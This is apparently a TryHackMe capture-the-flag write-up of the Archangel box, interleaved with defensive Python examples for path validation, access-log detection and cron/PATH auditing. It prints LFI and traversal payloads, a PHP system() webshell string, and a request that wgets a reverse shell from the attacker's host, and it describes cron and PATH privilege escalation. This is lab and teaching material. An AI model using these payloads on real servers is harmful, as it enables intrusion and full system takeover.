Archangel CTF — TryHackMe

Arrow
6 min read · Feb 7, 2021

Hello, everyone!
Back with a write-up on the TryHackMe Archangel CTF, a fairly easy Linux box involving LFI, Apache log poisoning and Linux privilege escalation by taking advantage of cron jobs and the PATH variable.

Archangel CTF room.

Enumeration

Let’s start the enumeration with nmap.

root@ip-10-10-80-17:~# nmap -sV -sC 10.10.213.254

Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-06 21:36 GMT
Nmap scan report for mafialive.thm (10.10.213.254)
Host is up (0.00078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
| 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_ 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/test.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:03:49:4F:A8:3F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds

Not much. Nmap revealed an Ubuntu machine with ports 22 and 80 open. At this point, the first thing I did was to run gobuster against the target, but apart from the /flag directory (which was a rabbit hole), nothing of interest emerged.
So, I fired up Firefox to have a look at the landing page of the site. There was not much to see on the main page either, but the support email revealed the hostname of the machine, which really comes in handy.

Hostname

Adding the above hostname to our /etc/hosts and re-running gobuster this time rewards us with much more info.

gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/common.txt -x tar,php,txt,cgi

gobuster directories found.

Bingo! robots.txt shows the way and reveals that we should have a look at the test.php page.

PHP LFI

The page is really simple: a PHP page with a button which, upon clicking, reveals a quote from the “Mr. Robot” series.

“Control is an illusion”

What caught my attention was the way the mrrobot.php page is loaded when requested: its path is passed in the view parameter. A useful page with a PHP LFI cheat sheet can be found here.

The payload used here to read the contents of the test.php file is the following:
?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

test.php PHP Wrapper Base64.

The above request uses a PHP wrapper (php://filter), which reads the resource we provide (in our case test.php) and outputs its contents base64-encoded. So, essentially, as soon as we decode the above base64 string, we get the contents of test.php. There are tons of ways to decode it; in my case, I chose the Linux built-in “base64” command. Tools such as CyberChef would do the job just fine as well.

test.php contents.

If we take a look at the code above, we can see that there is a control in place for rejecting path/directory traversal attacks. However, this control can be easily bypassed if, instead of ‘../..’, we use something like ‘.././..’. A cheat sheet with more options can be found here.
At the beginning of the enumeration, we found out that we are dealing with an Apache server, so if we can redirect ourselves to /var/log/apache2/access.log, we would be able to perform Apache log poisoning in order to gain access to the machine.
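To make the bypass concrete from the defender's side, here is an added example in Python (not the room's test.php, whose source is only visible in the screenshot): a naive denylist check of the kind the write-up describes, next to a canonicalising check that resolves the path before comparing it with the intended directory. BASE and the sample requests are constructed for the example.

```python
import posixpath

BASE = "/var/www/html/development_testing"  # directory test.php is meant to serve from


def naive_allows(view: str) -> bool:
    """Denylist check of the kind the write-up bypasses: reject the literal
    '../..' and require the expected prefix somewhere in the string."""
    return "../.." not in view and BASE in view


def hardened_allows(view: str, base: str = BASE) -> bool:
    """Allow only absolute, wrapper-free paths that canonicalise to a location
    inside `base`. normpath collapses every '.', '..' and '//', so '.././..'
    is judged on where it really points. On a live server use realpath()
    (PHP: realpath(), Python: os.path.realpath) so symlinks are resolved too."""
    if "://" in view or not view.startswith("/"):
        return False  # php://, data:// etc. and relative names are refused
    resolved = posixpath.normpath(view)
    return resolved == base or resolved.startswith(base + "/")


SAMPLES = {  # constructed requests, modelled on the write-up
    "legit": BASE + "/mrrobot.php",
    "classic": BASE + "/../../../../etc/passwd",
    "dotted": BASE + "/.././.././.././log/apache2/access.log",
    "wrapper": "php://filter/convert.base64-encode/resource=" + BASE + "/test.php",
}


def compare() -> dict:
    """{name: (naive verdict, hardened verdict)}; True means the file is served."""
    return {name: (naive_allows(v), hardened_allows(v)) for name, v in SAMPLES.items()}
```

The "dotted" and "wrapper" rows are the interesting ones: the substring check waves both through, while the canonicalising check serves only the legitimate file.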

Apache Log Poisoning

Indeed, if we replace the previous request on our browser with

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././log/apache2/access.log

we can see the Apache access log in our browser.
Hint: To get a more readable view of the log, right-click in the browser and select View Page Source.

Now that we have verified that the Apache log can be included, we can work on the log poisoning. The first step is to add the following piece of PHP code to the User-Agent header of our request, so that commands can be passed along with our browser requests (RCE).

Abuse User-Agent Header.

After that, I used a PHP reverse shell adapted to my needs, started a simple Python HTTP server and used the following request in order to download the file onto the target machine:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././log/apache2/access.log&cmd=wget http://10.10.80.17:5555/rs.php

We can verify that our reverse shell was successfully downloaded onto the target by sending an ‘ls -la’ command through the logs. Next, we start a netcat listener on the port configured in the reverse shell and request the following page from the server in order to get our shell.

Initial reverse shell.
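On the detection side, an added example (not part of the write-up) that parses Apache combined-format access.log lines and flags the traces a log-poisoning attempt leaves behind: a PHP tag in the User-Agent, traversal sequences or php:// wrappers in the URL, and reads of the log file itself. The log lines are constructed to resemble this room's traffic.

```python
import re
from typing import Dict, List

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

RULES = {
    "php_tag_in_ua": re.compile(r"<\?(php|=)", re.I),                   # code smuggled into the UA
    "traversal_in_url": re.compile(r"(\.\./|\.\.%2f|\./\.\.)", re.I),   # incl. the '.././..' variant
    "php_wrapper_in_url": re.compile(r"\b(php|data|expect|phar)://", re.I),
    "log_read_in_url": re.compile(r"/log/apache2/|/var/log/", re.I),    # the log being included
}
URL_RULES = ("traversal_in_url", "php_wrapper_in_url", "log_read_in_url")

SAMPLE_LOG = """\
10.10.80.17 - - [06/Feb/2021:21:40:01 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.80.17 - - [06/Feb/2021:21:41:13 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1440 "-" "Mozilla/5.0"
10.10.80.17 - - [06/Feb/2021:21:42:27 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././.././log/apache2/access.log HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
10.10.80.17 - - [06/Feb/2021:21:43:05 +0000] "GET / HTTP/1.1" 200 300 "-" "<?php system($_GET['cmd']); ?>"
"""  # constructed lines: one benign request, then the three stages described in the write-up


def analyse(text: str) -> List[Dict]:
    """Return one finding per suspicious line: {'line': n, 'host': ip, 'rules': [...]}."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = COMBINED.match(line)
        if not m:
            continue  # malformed line; production tooling should count these separately
        hits = ["php_tag_in_ua"] if RULES["php_tag_in_ua"].search(m["ua"]) else []
        hits += [name for name in URL_RULES if RULES[name].search(m["request"])]
        if hits:
            findings.append({"line": n, "host": m["host"], "rules": hits})
    return findings
```

A single source hitting a wrapper read, then a traversal into the log, then a PHP tag in its User-Agent within minutes is exactly the sequence worth alerting on, so correlate findings per host rather than treating each rule in isolation.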

User Privilege Escalation

We managed to get our way into the server as the www-data user. If we enumerate the server a little, either manually or by using a tool such as linpeas.sh, soon enough we will come across a cron job run by the archangel user.

Archangel Cron Task.

Unfortunately for the archangel user, the www-data user can modify that script, which lets us take advantage of the cron task in order to escalate our user privileges. A very good article on abusing cron tasks can be found here. The exploit is really easy. All we have to do is modify the script so that it spawns a bash reverse shell, start our netcat listener once more, and wait for the cron task to be executed. Boom! We are archangel now!

Escalation to archangel user.

Root Privilege Escalation

Digging a little into archangel’s home directory, we came across an executable named backup. Upon execution, we can see that the executable is using the cp command, but without its full path, so cp is looked up through $PATH. This is a really bad practice, as an attacker can take advantage of it quite simply, as we will see below.

All we have to do is create an executable file named cp in the /tmp directory, which in fact just runs “/bin/bash”, and add the /tmp directory to the machine’s $PATH. As soon as we re-run the backup executable, we get our root shell.

Root Escalation.
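Both escalation steps (the cron job above and the PATH lookup here) rest on a privileged context trusting something an unprivileged user can write. As an added audit example, not from the room, the script below flags crontab entries whose script is group/world-writable and PATH entries that an unprivileged user could use to shadow cp; the script name, directory and crontab text in demo() are constructed.

```python
import os
import stat
import tempfile


def writable_by_others(path: str) -> bool:
    """True when the group or world write bit is set on `path`."""
    try:
        return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except OSError:
        return False  # missing or unreadable: nothing to hijack here


def audit_crontab(text: str) -> list:
    """Flag crontab lines whose command refers to a script others can modify.
    Works for /etc/crontab (schedule, user, command) and for user crontabs."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comments and VAR=value lines
        for tok in line.split()[5:]:  # skip the five schedule fields
            if tok.startswith("/") and writable_by_others(tok):
                findings.append(f"cron script {tok} is group/world-writable: {line}")
    return findings


def audit_path(path_value: str) -> list:
    """Flag PATH entries that let an unprivileged user shadow binaries like cp:
    empty or relative entries (resolved against the cwd) and writable directories."""
    findings = []
    for entry in path_value.split(":"):
        if not entry.startswith("/"):
            findings.append(f"relative PATH entry {entry!r}")
        elif writable_by_others(entry):
            findings.append(f"writable PATH entry {entry}")
    return findings


def demo() -> dict:
    """Constructed scenario: a world-writable cron script, plus a PATH that has
    been extended with the same writable directory (as /tmp was in the write-up)."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "cron_task.sh")  # constructed script name
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho hello\n")
    os.chmod(script, 0o777)  # the misconfiguration: anyone may edit it
    os.chmod(d, 0o777)
    crontab = f"SHELL=/bin/sh\n*/1 * * * * archangel {script}\n0 3 * * * root /bin/true\n"
    return {"cron": audit_crontab(crontab), "path": audit_path(f"/usr/local/bin:/usr/bin:/bin:{d}:")}
```

The other case worth checking is a cron script owned by a less privileged user than the one cron runs it as (compare st_uid against the job's user), which the mode bits alone do not reveal.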

That’s all for today. I hope you enjoyed my write-up, as much as I enjoyed writing it.
See you next time and keep hacking! :)
